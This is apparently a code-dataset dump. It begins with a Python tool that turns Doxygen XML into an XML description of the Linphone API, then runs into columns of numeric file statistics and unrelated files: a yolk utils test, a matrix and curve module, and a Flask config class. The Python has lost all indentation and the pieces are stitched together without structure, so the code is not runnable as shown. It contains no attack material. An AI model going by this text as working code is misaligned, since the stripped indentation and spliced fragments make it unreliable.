def __init__(self):
self.arguments = []
def addArgument(self, arg):
self.arguments.append(arg)
def __len__(self):
return len(self.arguments)
def __getitem__(self, key):
return self.arguments[key]
def __str__(self):
argstr = []
for arg in self.arguments:
argstr.append(str(arg))
return ', '.join(argstr)
class CFunction(CObject):
def __init__(self, name, returnarg, argslist):
CObject.__init__(self, name)
self.returnArgument = returnarg
self.arguments = argslist
self.location = None
class CEvent(CFunction):
pass
class CProperty:
def __init__(self, name):
self.name = name
self.getter = None
self.setter = None
class CClass(CObject):
def __init__(self, st):
CObject.__init__(self, st.associatedTypedef.name)
if st.deprecated or st.associatedTypedef.deprecated:
self.deprecated = True
if len(st.associatedTypedef.briefDescription) > 0:
self.briefDescription = st.associatedTypedef.briefDescription
elif len(st.briefDescription) > 0:
self.briefDescription = st.briefDescription
if st.associatedTypedef.detailedDescription is not None:
self.detailedDescription = st.associatedTypedef.detailedDescription
elif st.detailedDescription is not None:
self.detailedDescription = st.detailedDescription
self.__struct = st
self.events = {}
self.classMethods = {}
self.instanceMethods = {}
self.properties = {}
self.__computeCFunctionPrefix()
def __computeCFunctionPrefix(self):
self.cFunctionPrefix = ''
first = True
for l in self.name:
if l.isupper() and not first:
self.cFunctionPrefix += '_'
self.cFunctionPrefix += l.lower()
first = False
self.cFunctionPrefix += '_'
def __addPropertyGetter(self, name, f):
if not name in self.properties:
prop = CProperty(name)
self.properties[name] = prop
self.properties[name].getter = f
def __addPropertySetter(self, name, f):
if not name in self.properties:
prop = CProperty(name)
self.properties[name] = prop
self.properties[name].setter = f
def __addClassMethod(self, f):
if not f.name in self.classMethods:
self.classMethods[f.name] = f
def __addInstanceMethod(self, f):
name = f.name[len(self.cFunctionPrefix):]
if name.startswith('get_') and len(f.arguments) == 1:
self.__addPropertyGetter(name[4:], f)
elif name.startswith('is_') and len(f.arguments) == 1 and f.returnArgument.ctype == 'bool_t':
self.__addPropertyGetter(name, f)
elif name.endswith('_enabled') and len(f.arguments) == 1 and f.returnArgument.ctype == 'bool_t':
self.__addPropertyGetter(name, f)
elif name.startswith('set_') and len(f.arguments) == 2:
self.__addPropertySetter(name[4:], f)
elif name.startswith('enable_') and len(f.arguments) == 2 and f.arguments[1].ctype == 'bool_t':
self.__addPropertySetter(name[7:] + '_enabled', f)
else:
if not f.name in self.instanceMethods:
self.instanceMethods[f.name] = f
def addEvent(self, ev):
if not ev.name in self.events:
self.events[ev.name] = ev
def addMethod(self, f):
if len(f.arguments) > 0 and f.arguments[0].ctype == self.name:
self.__addInstanceMethod(f)
else:
self.__addClassMethod(f)
class Project:
def __init__(self):
self.verbose = False
self.prettyPrint = False
self.enums = []
self.__structs = []
self.__typedefs = []
self.__events = []
self.__functions = []
self.classes = []
self.docparser = metadoc.Parser()
def add(self, elem):
if isinstance(elem, CClass):
if self.verbose:
print("Adding class " + elem.name)
self.classes.append(elem)
elif isinstance(elem, CEnum):
if self.verbose:
print("Adding enum " + elem.name)
for ev in elem.values:
print("\t" + ev.name)
self.enums.append(elem)
elif isinstance(elem, CStruct):
if self.verbose:
print("Adding struct " + elem.name)
for sm in elem.members:
print("\t" + sm.ctype + " " + sm.name)
self.__structs.append(elem)
elif isinstance(elem, CTypedef):
if self.verbose:
print("Adding typedef " + elem.name)
print("\t" + elem.definition)
self.__typedefs.append(elem)
elif isinstance(elem, CEvent):
if self.verbose:
print("Adding event " + elem.name)
print("\tReturns: " + elem.returnArgument.ctype)
print("\tArguments: " + str(elem.arguments))
self.__events.append(elem)
elif isinstance(elem, CFunction):
if self.verbose:
print("Adding function " + elem.name)
print("\tReturns: " + elem.returnArgument.ctype)
print("\tArguments: " + str(elem.arguments))
self.__functions.append(elem)
def __cleanDescription(self, descriptionNode):
for para in descriptionNode.findall('./para'):
for n in para.findall('./parameterlist'):
para.remove(n)
for n in para.findall("./simplesect[@kind='return']"):
para.remove(n)
for n in para.findall("./simplesect[@kind='see']"):
t = ''.join(n.itertext())
n.clear()
n.tag = 'see'
n.text = t
for n in para.findall("./simplesect[@kind='note']"):
n.tag = 'note'
n.attrib = {}
for n in para.findall(".//xrefsect"):
para.remove(n)
for n in para.findall('.//ref'):
n.attrib = {}
for n in para.findall(".//bctbx_list"):
para.remove(n)
if descriptionNode.tag == 'parameterdescription':
descriptionNode.tag = 'description'
if descriptionNode.tag == 'simplesect':
descriptionNode.tag = 'description'
descriptionNode.attrib = {}
return descriptionNode
def __canBeWrapped(self, node):
return node.find('./detaileddescription//donotwrap') is None
def __discoverClasses(self):
for td in self.__typedefs:
if td.definition.startswith('enum '):
for e in self.enums:
if (e.associatedTypedef is None) and td.definition[5:] == e.name:
e.associatedTypedef = td
break
elif td.definition.startswith('struct '):
structFound = False
for st in self.__structs:
if (st.associatedTypedef is None) and td.definition[7:] == st.name:
st.associatedTypedef = td
structFound = True
break
if not structFound:
name = td.definition[7:]
print("Structure with no associated typedef: " + name)
st = CStruct(name)
st.associatedTypedef = td
self.add(st)
for td in self.__typedefs:
if td.definition.startswith('struct '):
for st in self.__structs:
if st.associatedTypedef == td:
cclass = CClass(st)
cclass.briefDoc = td.briefDoc
self.add(cclass)
break
elif ('Linphone' + td.definition) == td.name:
st = CStruct(td.name)
st.associatedTypedef = td
cclass = CClass(st)
cclass.briefDoc = td.briefDoc
self.add(st)
self.add(cclass)
# Sort classes by length of name (longest first), so that methods are put in the right class
self.classes.sort(key = lambda c: len(c.name), reverse = True)
for e in self.__events:
eventAdded = False
for c in self.classes:
if c.name.endswith('Cbs') and e.name.startswith(c.name):
c.addEvent(e)
eventAdded = True
break
if not eventAdded:
for c in self.classes:
if e.name.startswith(c.name):
c.addEvent(e)
eventAdded = True
break
for f in self.__functions:
for c in self.classes:
if c.cFunctionPrefix == f.name[0 : len(c.cFunctionPrefix)]:
c.addMethod(f)
break
def __parseCEnumValueInitializer(self, initializer):
initializer = initializer.strip()
if not initializer.startswith('='):
return None
initializer = initializer[1:]
initializer.strip()
return initializer
def __parseCEnumValue(self, node):
ev = CEnumValue(node.find('./name').text)
initializerNode = node.find('./initializer')
if initializerNode is not None:
ev.value = self.__parseCEnumValueInitializer(initializerNode.text)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
ev.deprecated = True
ev.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
ev.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
ev.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
return ev
def __parseCEnumMemberdef(self, node):
if not Project.__canBeWrapped(self, node):
return None
e = CEnum(node.find('./name').text)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
e.deprecated = True
e.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
e.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
e.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
enumvalues = node.findall("enumvalue[@prot='public']")
for enumvalue in enumvalues:
ev = self.__parseCEnumValue(enumvalue)
e.addValue(ev)
return e
def __findCEnum(self, tree):
memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='enum']/memberdef[@kind='enum'][@prot='public']")
for m in memberdefs:
e = self.__parseCEnumMemberdef(m)
self.add(e)
def __parseCStructMember(self, node, structname):
name = node.find('./name').text
definition = node.find('./definition').text
t = definition[0:definition.find(structname + "::" + name)]
sm = CStructMember(name, t)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
sm.deprecated = True
sm.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
sm.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
sm.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
return sm
def __parseCStructCompounddef(self, node):
s = CStruct(node.find('./compoundname').text)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
s.deprecated = True
s.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
s.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
s.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
structmembers = node.findall("sectiondef/memberdef[@kind='variable'][@prot='public']")
for structmember in structmembers:
sm = self.__parseCStructMember(structmember, s.name)
s.addMember(sm)
return s
def __findCStruct(self, tree):
compounddefs = tree.findall("./compounddef[@kind='struct'][@prot='public']")
for c in compounddefs:
s = self.__parseCStructCompounddef(c)
self.add(s)
def __parseCTypedefMemberdef(self, node):
if not Project.__canBeWrapped(self, node):
return None
name = node.find('./name').text
definition = node.find('./definition').text
if definition.startswith('typedef '):
definition = definition[8 :]
if name.endswith('Cb'):
pos = definition.find("(*")
if pos == -1:
return None
returntype = definition[0:pos].strip()
returnarg = CArgument(returntype, enums = self.enums, structs = self.__structs)
returndesc = node.find("./detaileddescription/para/simplesect[@kind='return']")
if returndesc is not None:
if returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t':
n = returndesc.find('.//bctbxlist')
if n is not None:
returnarg.containedType = n.text
returnarg.description = self.__cleanDescription(returndesc)
elif returnarg.completeType != 'void':
missingDocWarning += "\tReturn value is not documented\n"
definition = definition[pos + 2 :]
pos = definition.find("(")
definition = definition[pos + 1 : -1]
argslist = CArgumentsList()
for argdef in definition.split(', '):
argType = ''
starPos = argdef.rfind('*')
spacePos = argdef.rfind(' ')
if starPos != -1:
argType = argdef[0 : starPos + 1]
argName = argdef[starPos + 1 :]
elif spacePos != -1:
argType = argdef[0 : spacePos]
argName = argdef[spacePos + 1 :]
argslist.addArgument(CArgument(argType, argName, self.enums, self.__structs))
if len(argslist) > 0:
paramdescs = node.findall("detaileddescription/para/parameterlist[@kind='param']/parameteritem")
if paramdescs:
for arg in argslist.arguments:
for paramdesc in paramdescs:
if arg.name == paramdesc.find('./parameternamelist').find('./parametername').text:
arg.description = self.__cleanDescription(paramdesc.find('./parameterdescription'))
missingDocWarning = ''
for arg in argslist.arguments:
if arg.description == None:
missingDocWarning += "\t'" + arg.name + "' parameter not documented\n";
if missingDocWarning != '':
print(name + ":\n" + missingDocWarning)
f = CEvent(name, returnarg, argslist)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
f.deprecated = True
f.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
f.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
f.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
return f
else:
pos = definition.rfind(" " + name)
if pos != -1:
definition = definition[0 : pos]
td = CTypedef(name, definition)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
td.deprecated = True
td.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
td.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
td.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
return td
return None
def __findCTypedef(self, tree):
memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='typedef']/memberdef[@kind='typedef'][@prot='public']")
for m in memberdefs:
td = self.__parseCTypedefMemberdef(m)
self.add(td)
def __parseCFunctionMemberdef(self, node):
if not Project.__canBeWrapped(self, node):
return None
internal = node.find("./detaileddescription/internal")
if internal is not None:
return None
missingDocWarning = ''
name = node.find('./name').text
t = ''.join(node.find('./type').itertext())
returnarg = CArgument(t, enums = self.enums, structs = self.__structs)
returndesc = node.find("./detaileddescription/para/simplesect[@kind='return']")
if returndesc is not None:
if returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t':
n = returndesc.find('.//bctbxlist')
if n is not None:
returnarg.containedType = n.text
returnarg.description = self.__cleanDescription(returndesc)
elif returnarg.completeType != 'void':
missingDocWarning += "\tReturn value is not documented\n"
argslist = CArgumentsList()
argslistNode = node.findall('./param')
for argNode in argslistNode:
argType = ''.join(argNode.find('./type').itertext())
argName = ''
argNameNode = argNode.find('./declname')
if argNameNode is not None:
argName = ''.join(argNameNode.itertext())
if argType != 'void':
argslist.addArgument(CArgument(argType, argName, self.enums, self.__structs))
if len(argslist) > 0:
paramdescs = node.findall("./detaileddescription/para/parameterlist[@kind='param']/parameteritem")
if paramdescs:
for arg in argslist.arguments:
for paramdesc in paramdescs:
if arg.name == paramdesc.find('./parameternamelist').find('./parametername').text:
if arg.ctype == 'MSList' or arg.ctype == 'bctbx_list_t':
n = paramdesc.find('.//bctbxlist')
if n is not None:
arg.containedType = n.text
arg.description = self.__cleanDescription(paramdesc.find('./parameterdescription'))
missingDocWarning = ''
for arg in argslist.arguments:
if arg.description == None:
missingDocWarning += "\t'" + arg.name + "' parameter not documented\n";
f = CFunction(name, returnarg, argslist)
deprecatedNode = node.find(".//xrefsect[xreftitle='Deprecated']")
if deprecatedNode is not None:
f.deprecated = True
f.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()
f.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))
f.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))
if f.briefDescription == '' and ''.join(f.detailedDescription.itertext()).strip() == '':
return None
locationNode = node.find('./location')
if locationNode is not None:
f.location = locationNode.get('file')
if not f.location.endswith('.h'):
missingDocWarning += "\tNot documented in a header file ('" + f.location + "')\n";
if missingDocWarning != '':
print(name + ":\n" + missingDocWarning)
return f
def __findCFunction(self, tree):
memberdefs = tree.findall("./compounddef[@kind='group']/sectiondef[@kind='func']/memberdef[@kind='function'][@prot='public'][@static='no']")
for m in memberdefs:
f = self.__parseCFunctionMemberdef(m)
if f is not None:
self.add(f)
def initFromFiles(self, xmlfiles):
trees = []
for f in xmlfiles:
tree = None
try:
if self.verbose:
print("Parsing XML file: " + f.name)
tree = ET.parse(f)
except ET.ParseError as e:
print(e)
if tree is not None:
trees.append(tree)
for tree in trees:
self.__findCEnum(tree)
for tree in trees:
self.__findCStruct(tree)
for tree in trees:
self.__findCTypedef(tree)
for tree in trees:
self.__findCFunction(tree)
self.__discoverClasses()
def initFromDir(self, xmldir):
files = [ os.path.join(xmldir, f) for f in os.listdir(xmldir) if (os.path.isfile(os.path.join(xmldir, f)) and f.endswith('.xml')) ]
self.initFromFiles(files)
def check(self):
for c in self.classes:
for name, p in six.iteritems(c.properties):
if p.getter is None and p.setter is not None:
print("Property '" + name + "' of class '" + c.name + "' has a setter but no getter")
class Generator:
def __init__(self, outputfile):
self.__outputfile = outputfile
def __generateEnum(self, cenum, enumsNode):
enumNodeAttributes = { 'name' : cenum.name, 'deprecated' : str(cenum.deprecated).lower() }
if cenum.associatedTypedef is not None:
enumNodeAttributes['name'] = cenum.associatedTypedef.name
enumNode = ET.SubElement(enumsNode, 'enum', enumNodeAttributes)
if cenum.briefDescription != '':
enumBriefDescriptionNode = ET.SubElement(enumNode, 'briefdescription')
enumBriefDescriptionNode.text = cenum.briefDescription
enumNode.append(cenum.detailedDescription)
if len(cenum.values) > 0:
enumValuesNode = ET.SubElement(enumNode, 'values')
for value in cenum.values:
enumValuesNodeAttributes = { 'name' : value.name, 'deprecated' : str(value.deprecated).lower() }
valueNode = ET.SubElement(enumValuesNode, 'value', enumValuesNodeAttributes)
if value.briefDescription != '':
valueBriefDescriptionNode = ET.SubElement(valueNode, 'briefdescription')
valueBriefDescriptionNode.text = value.briefDescription
valueNode.append(value.detailedDescription)
def __generateFunction(self, parentNode, nodeName, f):
functionAttributes = { 'name' : f.name, 'deprecated' : str(f.deprecated).lower() }
if f.location is not None:
functionAttributes['location'] = f.location
functionNode = ET.SubElement(parentNode, nodeName, functionAttributes)
returnValueAttributes = { 'type' : f.returnArgument.ctype, 'completetype' : f.returnArgument.completeType }
if f.returnArgument.containedType is not None:
returnValueAttributes['containedtype'] = f.returnArgument.containedType
returnValueNode = ET.SubElement(functionNode, 'return', returnValueAttributes)
if f.returnArgument.description is not None:
returnValueNode.append(f.returnArgument.description)
argumentsNode = ET.SubElement(functionNode, 'arguments')
for arg in f.arguments:
argumentNodeAttributes = { 'name' : arg.name, 'type' : arg.ctype, 'completetype' : arg.completeType }
if arg.containedType is not None:
argumentNodeAttributes['containedtype'] = arg.containedType
argumentNode = ET.SubElement(argumentsNode, 'argument', argumentNodeAttributes)
if arg.description is not None:
argumentNode.append(arg.description)
if f.briefDescription != '':
functionBriefDescriptionNode = ET.SubElement(functionNode, 'briefdescription')
functionBriefDescriptionNode.text = f.briefDescription
functionNode.append(f.detailedDescription)
def __generateClass(self, cclass, classesNode):
# Do not include classes that contain nothing
if len(cclass.events) == 0 and len(cclass.classMethods) == 0 and \
len(cclass.instanceMethods) == 0 and len(cclass.properties) == 0:
return
# Check the capabilities of the class
has_ref_method = False
has_unref_method = False
has_destroy_method = False
for methodname in cclass.instanceMethods:
methodname_without_prefix = methodname.replace(cclass.cFunctionPrefix, '')
if methodname_without_prefix == 'ref':
has_ref_method = True
elif methodname_without_prefix == 'unref':
has_unref_method = True
elif methodname_without_prefix == 'destroy':
has_destroy_method = True
refcountable = False
destroyable = False
if has_ref_method and has_unref_method:
refcountable = True
if has_destroy_method:
destroyable = True
classNodeAttributes = {
'name' : cclass.name,
'cfunctionprefix' : cclass.cFunctionPrefix,
'deprecated' : str(cclass.deprecated).lower(),
'refcountable' : str(refcountable).lower(),
'destroyable' : str(destroyable).lower()
}
# Generate the XML node for the class
classNode = ET.SubElement(classesNode, 'class', classNodeAttributes)
if len(cclass.events) > 0:
eventsNode = ET.SubElement(classNode, 'events')
eventnames = []
for eventname in cclass.events:
eventnames.append(eventname)
eventnames.sort()
for eventname in eventnames:
self.__generateFunction(eventsNode, 'event', cclass.events[eventname])
if len(cclass.classMethods) > 0:
classMethodsNode = ET.SubElement(classNode, 'classmethods')
methodnames = []
for methodname in cclass.classMethods:
methodnames.append(methodname)
methodnames.sort()
for methodname in methodnames:
self.__generateFunction(classMethodsNode, 'classmethod', cclass.classMethods[methodname])
if len(cclass.instanceMethods) > 0:
instanceMethodsNode = ET.SubElement(classNode, 'instancemethods')
methodnames = []
for methodname in cclass.instanceMethods:
methodnames.append(methodname)
methodnames.sort()
for methodname in methodnames:
self.__generateFunction(instanceMethodsNode, 'instancemethod', cclass.instanceMethods[methodname])
if len(cclass.properties) > 0:
propertiesNode = ET.SubElement(classNode, 'properties')
propnames = []
for propname in cclass.properties:
propnames.append(propname)
propnames.sort()
for propname in propnames:
propertyNodeAttributes = { 'name' : propname }
propertyNode = ET.SubElement(propertiesNode, 'property', propertyNodeAttributes)
if cclass.properties[propname].getter is not None:
self.__generateFunction(propertyNode, 'getter', cclass.properties[propname].getter)
if cclass.properties[propname].setter is not None:
self.__generateFunction(propertyNode, 'setter', cclass.properties[propname].setter)
if cclass.briefDescription != '':
classBriefDescriptionNode = ET.SubElement(classNode, 'briefdescription')
classBriefDescriptionNode.text = cclass.briefDescription
classNode.append(cclass.detailedDescription)
def generate(self, project):
print("Generating XML document of Linphone API to '" + self.__outputfile.name + "'")
apiNode = ET.Element('api')
project.enums.sort(key = lambda e: e.name)
if len(project.enums) > 0:
enumsNode = ET.SubElement(apiNode, 'enums')
for cenum in project.enums:
self.__generateEnum(cenum, enumsNode)
if len(project.classes) > 0:
classesNode = ET.SubElement(apiNode, 'classes')
project.classes.sort(key = lambda c: c.name)
for cclass in project.classes:
self.__generateClass(cclass, classesNode)
s = '<?xml version="1.0" encoding="UTF-8" ?>\n'.encode('utf-8')
s += ET.tostring(apiNode, 'utf-8')
if project.prettyPrint:
s = minidom.parseString(s).toprettyxml(indent='\t')
self.__outputfile.write(s)
def main(argv = None):
if argv is None:
argv = sys.argv
argparser = argparse.ArgumentParser(description="Generate XML version of the Linphone API.")
argparser.add_argument('-o', '--outputfile', metavar='outputfile', type=argparse.FileType('w'), help="Output XML file describing the Linphone API.")
argparser.add_argument('--verbose', help="Increase output verbosity", action='store_true')
argparser.add_argument('--pretty', help="XML pretty print", action='store_true')
argparser.add_argument('xmldir', help="XML directory generated by doxygen.")
args = argparser.parse_args()
if args.outputfile == None:
args.outputfile = open('api.xml', 'w')
project = Project()
if args.verbose:
project.verbose = True
if args.pretty:
project.prettyPrint = True
project.initFromDir(args.xmldir)
project.check()
gen = Generator(args.outputfile)
gen.generate(project)
if __name__ == "__main__":
sys.exit(main())
| 35.977358
| 149
| 0.706559
| 3,369
| 28,602
| 5.897596
| 0.133868
| 0.017313
| 0.014042
| 0.008153
| 0.373144
| 0.321204
| 0.278424
| 0.232926
| 0.213196
| 0.208868
| 0
| 0.003129
| 0.161912
| 28,602
| 794
| 150
| 36.02267
| 0.825748
| 0.035767
| 0
| 0.267806
| 0
| 0.004274
| 0.120401
| 0.045214
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071225
| false
| 0.001425
| 0.011396
| 0.005698
| 0.135328
| 0.029915
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86686cf65534bfae5dd8d13670449f7c68cf0bb3
| 2,226
|
py
|
Python
|
yolk/test/utils.py
|
yolkdata/yolk-python
|
978d98cbe637c1309a1be766a40bb874e996c61d
|
[
"MIT",
"Unlicense"
] | null | null | null |
yolk/test/utils.py
|
yolkdata/yolk-python
|
978d98cbe637c1309a1be766a40bb874e996c61d
|
[
"MIT",
"Unlicense"
] | null | null | null |
yolk/test/utils.py
|
yolkdata/yolk-python
|
978d98cbe637c1309a1be766a40bb874e996c61d
|
[
"MIT",
"Unlicense"
] | null | null | null |
from datetime import date, datetime, timedelta
from decimal import Decimal
import unittest
from dateutil.tz import tzutc
import six
from yolk import utils
class TestUtils(unittest.TestCase):
def test_timezone_utils(self):
now = datetime.now()
utcnow = datetime.now(tz=tzutc())
self.assertTrue(utils.is_naive(now))
self.assertFalse(utils.is_naive(utcnow))
fixed = utils.guess_timezone(now)
self.assertFalse(utils.is_naive(fixed))
shouldnt_be_edited = utils.guess_timezone(utcnow)
self.assertEqual(utcnow, shouldnt_be_edited)
def test_clean(self):
simple = {
'decimal': Decimal('0.142857'),
'unicode': six.u('woo'),
'date': datetime.now(),
'long': 200000000,
'integer': 1,
'float': 2.0,
'bool': True,
'str': 'woo',
'none': None
}
complicated = {
'exception': Exception('This should show up'),
'timedelta': timedelta(microseconds=20),
'list': [1, 2, 3]
}
combined = dict(simple.items())
combined.update(complicated.items())
pre_clean_keys = combined.keys()
utils.clean(combined)
self.assertEqual(combined.keys(), pre_clean_keys)
def test_clean_with_dates(self):
dict_with_dates = {
'birthdate': date(1980, 1, 1),
'registration': datetime.utcnow(),
}
self.assertEqual(dict_with_dates, utils.clean(dict_with_dates))
@classmethod
def test_bytes(cls):
if six.PY3:
item = bytes(10)
else:
item = bytearray(10)
utils.clean(item)
def test_clean_fn(self):
cleaned = utils.clean({'fn': lambda x: x, 'number': 4})
self.assertEqual(cleaned['number'], 4)
if 'fn' in cleaned:
self.assertEqual(cleaned['fn'], None)
def test_remove_slash(self):
self.assertEqual('http://segment.io',
utils.remove_trailing_slash('http://segment.io/'))
self.assertEqual('http://segment.io',
utils.remove_trailing_slash('http://segment.io'))
| 28.177215
| 75
| 0.574573
| 245
| 2,226
| 5.081633
| 0.37551
| 0.084337
| 0.041767
| 0.036948
| 0.15261
| 0.15261
| 0.104418
| 0.104418
| 0.104418
| 0.104418
| 0
| 0.023718
| 0.299191
| 2,226
| 78
| 76
| 28.538462
| 0.774359
| 0
| 0
| 0.032787
| 0
| 0
| 0.093441
| 0
| 0
| 0
| 0
| 0
| 0.163934
| 1
| 0.098361
| false
| 0
| 0.098361
| 0
| 0.213115
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
866878f76f3d3d6bb3a8d89014200d8e8b85019b
| 2,797
|
py
|
Python
|
09Scan/matrix.py
|
kw1122/MKS66
|
25986e79077692afbc085920af1fef276c22d967
|
[
"MIT"
] | null | null | null |
09Scan/matrix.py
|
kw1122/MKS66
|
25986e79077692afbc085920af1fef276c22d967
|
[
"MIT"
] | null | null | null |
09Scan/matrix.py
|
kw1122/MKS66
|
25986e79077692afbc085920af1fef276c22d967
|
[
"MIT"
] | null | null | null |
"""
A matrix will be an N sized list of 4 element lists.
Each individual list will represent an [x, y, z, 1] point.
For multiplication purposes, consider the lists like so:
x0 x1 xn
y0 y1 yn
z0 z1 ... zn
1 1 1
"""
import math
def make_bezier():
return [
[-1, 3, -3, 1],
[3, -6, 3, 0],
[-3, 3, 0, 0],
[1, 0, 0, 0]
]
def make_hermite():
return [
[2, -3, 0, 1],
[-2, 3, 0, 0],
[1, -2, 1, 0],
[1, -1, 0, 0]
]
def generate_curve_coefs(p0, p1, p2, p3, t):
coefs = [[p0, p1, p2, p3]]
if t == 'hermite':
curve = make_hermite()
else:
curve = make_bezier()
matrix_mult(curve, coefs)
return coefs
def make_translate(x, y, z):
t = new_matrix()
ident(t)
t[3][0] = x
t[3][1] = y
t[3][2] = z
return t
def make_scale(x, y, z):
t = new_matrix()
ident(t)
t[0][0] = x
t[1][1] = y
t[2][2] = z
return t
def make_rotX(theta):
t = new_matrix()
ident(t)
t[1][1] = math.cos(theta)
t[2][1] = -math.sin(theta)
t[1][2] = math.sin(theta)
t[2][2] = math.cos(theta)
return t
def make_rotY(theta):
t = new_matrix()
ident(t)
t[0][0] = math.cos(theta)
t[0][2] = -math.sin(theta)
t[2][0] = math.sin(theta)
t[2][2] = math.cos(theta)
return t
def make_rotZ(theta):
t = new_matrix()
ident(t)
t[0][0] = math.cos(theta)
t[1][0] = -math.sin(theta)
t[0][1] = math.sin(theta)
t[1][1] = math.cos(theta)
return t
#print the matrix such that it looks like
#the template in the top comment
def print_matrix(matrix):
s = ''
for r in range(len(matrix[0])):
for c in range(len(matrix)):
s+= str(matrix[c][r]) + ' '
s += '\n'
print (s)
#turn the paramter matrix into an identity matrix
#you may assume matrix is square
def ident(matrix):
for r in range(len(matrix[0])):
for c in range(len(matrix)):
if r == c:
matrix[c][r] = 1
else:
matrix[c][r] = 0
#multiply m1 by m2, modifying m2 to be the product
#m1 * m2 -> m2
def matrix_mult(m1, m2):
point = 0
for row in m2:
#get a copy of the next point
tmp = row[:]
for r in range(4):
m2[point][r] = (m1[0][r] * tmp[0] +
m1[1][r] * tmp[1] +
m1[2][r] * tmp[2] +
m1[3][r] * tmp[3])
point += 1
def new_matrix(rows = 4, cols = 4):
m = []
for c in range(cols):
m.append([])
for r in range(rows):
m[c].append(0)
return m
| 22.739837
| 59
| 0.464784
| 442
| 2,797
| 2.895928
| 0.244344
| 0.05625
| 0.05625
| 0.060938
| 0.355469
| 0.317969
| 0.235938
| 0.21875
| 0.217188
| 0.185938
| 0
| 0.06843
| 0.378262
| 2,797
| 122
| 60
| 22.92623
| 0.667625
| 0.167322
| 0
| 0.315217
| 0
| 0
| 0.00456
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.130435
| false
| 0
| 0.01087
| 0.021739
| 0.23913
| 0.021739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
866977a21872a2e8438dbbd5f5b289547da5a50c
| 641
|
py
|
Python
|
app/flaskApp/config.py
|
jeanmarc2019/PTHacks2019-Planning
|
bc0c71588187fde8498494b3e74728c09de56f18
|
[
"MIT"
] | null | null | null |
app/flaskApp/config.py
|
jeanmarc2019/PTHacks2019-Planning
|
bc0c71588187fde8498494b3e74728c09de56f18
|
[
"MIT"
] | null | null | null |
app/flaskApp/config.py
|
jeanmarc2019/PTHacks2019-Planning
|
bc0c71588187fde8498494b3e74728c09de56f18
|
[
"MIT"
] | null | null | null |
import configparser
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
dir_path += '/cfg.ini'
class Configuration(object):
def __init__(self,debug=False):
section = "Flask-debug" if debug else "Flask"
cfg = configparser.ConfigParser()
cfg.read(dir_path if debug else "/var/www/html/flaskApp/cfg.ini")
self.debug = cfg.getboolean(section, "DEBUG")
self.csrf_enabled = cfg.getboolean(section,"CSRF_ENABLED")
self.threads_per_page = cfg.getint(section,"THREADS_PER_PAGE")
self.port = cfg.getint(section,"PORT")
self.host = cfg.get(section,"HOST")
| 29.136364
| 73
| 0.669267
| 84
| 641
| 4.904762
| 0.440476
| 0.050971
| 0.053398
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.199688
| 641
| 21
| 74
| 30.52381
| 0.803119
| 0
| 0
| 0
| 0
| 0
| 0.148206
| 0.046802
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.142857
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
866b4e64606eb0b8b047d742a5c885f477addc0c
| 1,551
|
py
|
Python
|
authentication/migrate.py
|
anae09/electionWebService
|
756968e5cd6db1422ae5fe8445a9e92a25953073
|
[
"MIT"
] | null | null | null |
authentication/migrate.py
|
